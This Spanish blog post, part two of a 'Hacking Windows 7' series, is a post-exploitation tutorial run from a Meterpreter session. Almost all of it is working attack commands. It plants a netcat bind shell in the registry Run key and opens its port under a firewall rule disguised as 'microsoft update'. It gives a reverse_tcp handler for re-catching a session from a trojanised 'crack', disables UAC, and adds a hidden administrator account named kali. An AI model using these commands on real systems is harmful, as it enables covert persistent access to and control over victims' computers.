viernes, 10 de enero de 2014

Hackear Windows 7 con antivirus 2/3

Seguimos con el Hacking Windows 7 con antivirus, ver la parte 1 si no la has visto.


Mostramos del registro que software se ejecuta al iniciar:
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Ahora añadimos nuestro backdoor:
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v <nombre> -d 'C:\windows\system32\nc.exe -d -L -p 12345 -e cmd.exe'
Y comprobamos que se introdujo.


Para ver que es lo que hace:
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v microsoft


Pero si hacemos un nmap vemos que el puerto 12345 aun no esta abierto, pero el backdoor si que esta funcionando.

Ahora necesitamos una consola de windows asi que: shell

Lo primero es ver el estado del firewall: netsh firewall show state

Como veis esta encendido


Ahora vemos los puertos abiertos, pero vemos que no nos lo muestra.


***En caso de que se caiga haremos: msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.1.67 lport=334 E
Y doble click en el crack para volver a tener una sesión de meterpreter.



Ahora abrimos el puertonetsh advfirewall firewall add rule name="microsoft update" dir=in action=allow protocol=TCP localport=12345

Vamos a comprobar al PC de la maquina que se realizo correctamente, asi que entramos en el firewall en permitir un programa.....
Vemos que si ademas vemos que no somos los unicos con acceso y que hay un Poison Ivy, que es un RAT para controlar equipos troyanizados.



Ahora desactivaremos el UAC (User Access Control), que es el que pide permisos al administrador para poder ejecutar cualquier programa.

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Para comprobarlo podemos ir navegando por el regedit y verificarlo, aqui se puede comprender mejor el comando introducimos antes.

Creamos un usuario de nombre y contraseña kali: net user kali kali /add  

La metemos en el grupo administradores: net localgroup administradores kali /add

Y comprobamos que se creo correctamente:
Pero no podemos dejar esa cuenta visible, asi que modificaremos el registro para ocultarla.
Usaremos la ruta HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts  pero specialaccounts hay que crearla:                         reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts
Creamos una carpeta dentro de specialaccounts llamada userlist
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist"


Configuramos la cuenta kali para que este oculta
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist" /v kali /t REG_DWORD /d 0 /f

Y comprobamos como se oculto



No hay comentarios:

Publicar un comentario